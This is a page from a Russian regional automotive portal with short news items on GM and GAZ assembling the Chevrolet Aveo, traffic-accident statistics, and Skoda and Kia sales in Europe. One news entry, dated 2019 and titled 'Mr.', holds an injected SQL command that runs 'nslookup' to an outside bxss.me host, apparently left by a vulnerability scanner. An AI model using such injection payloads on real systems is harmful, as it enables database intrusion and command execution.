Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
30 августа 2019г.
Mr.

1';copy (select '') to program 'nslookup dns.sqli.\013405.529-41394.529.a9e86.\1.bxss.me
Подробнее »
07 февраля 2011г.
Умирающую «Волгу» сменит дешевый американец

Концерн General Motors подписал договор с группой «ГАЗ» о начале промышленной сборки легковых автомобилей в Нижнем Новгороде. Согласно документу, летом 2012 года на конвейер Горьковского автомобильного завода встанет обновленная Chevrolet Aveo. GM и ГАЗ планируют производить по 30 тыс. хэтчбеков и седанов Aveo в год. Стартовый уровень локализации – 20%.
Подробнее »

МВД назвало безработных главными виновниками ДТП

Больше всего аварийных ситуаций на российских дорогах происходит с участием официально неработающих лиц и лиц рабочих специальностей. Нарушения ПДД представителями данных социальных групп привели к смерти 12 602 человек за 2013 год, сообщает МВД.
Подробнее »
Skoda Octavia стала одной из самых продаваемых машин в Европе
По итогам января модель чешского автопроизводителя вошла в «десятку» бестселлеров Европы, пишет аналитическое агентство «Автостат».

Помимо Octavia, другие автомобили концерна также пользовались высоким спросом в первом месяце 2012 года. Речь идет о моделях Yeti и Roomster, продажи которых значительно увеличились по сравнению с прошлогодними показателями.

В результате высокого уровня продаж, доля марки на европейском рынке увеличилась на 3,1%. Что касается самого объема реализации, то он вырос на 10,8%.



По итогам января высоких показателей продаж автомобилей в Европе также добилась марка Kia. Корейцы сумели увеличить продажи сразу на 33,3%. Эксперты заявляют, что основным генератором успеха Kia на рынке стал выпуск нового поколения модели Rio, продажи которого превзошли самые оптимистичные прогнозы.

Источник: Autonews
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика